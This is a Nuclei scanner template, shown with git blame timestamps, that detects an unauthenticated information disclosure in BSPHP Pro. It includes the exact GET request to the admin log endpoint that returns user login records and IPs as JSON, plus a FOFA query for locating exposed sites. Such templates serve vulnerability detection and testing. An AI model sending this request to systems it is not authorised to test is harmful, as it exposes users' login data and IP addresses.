nuclei-templates/http/vulnerabilities/bsphp-info.yaml

40 lines
1.3 KiB
YAML
Raw Normal View History

2023-08-07 12:56:48 +00:00
id: bsphp-info
info:
name: BSPHP - Information Disclosure
author: ritikchaddha
severity: low
description: Information disclosure in BSPHP Pro causing user and unauth IP disclosure.
2023-08-07 13:29:36 +00:00
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/BSPHP%20index.php%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- https://github.com/bigblackhat/oFx/blob/main/poc/BSPHP/Info_Disclosure/poc.py
2023-08-07 12:56:48 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-08-07 12:56:48 +00:00
fofa-query: title="BSPHP"
tags: bsphp,info,disclosure
http:
- method: GET
path:
- '{{BaseURL}}/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0'
matchers-condition: and
matchers:
- type: word
2024-06-12 12:20:42 +00:00
part: body
2023-08-07 12:56:48 +00:00
words:
- '{"data":'
- '"id"'
- '"user"'
condition: and
- type: word
2024-06-12 12:20:42 +00:00
part: content_type
2023-08-07 12:56:48 +00:00
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a004630440220652faa7e1bd008edefb25d6e1cae33738436dfbd246a89837aa135da98d159a90220156ca327bbb5643f27fb67f3e634ee42d882017efe550d46e3e70ebc93c1cefb:922c64590222798bb761d5b6d8e72950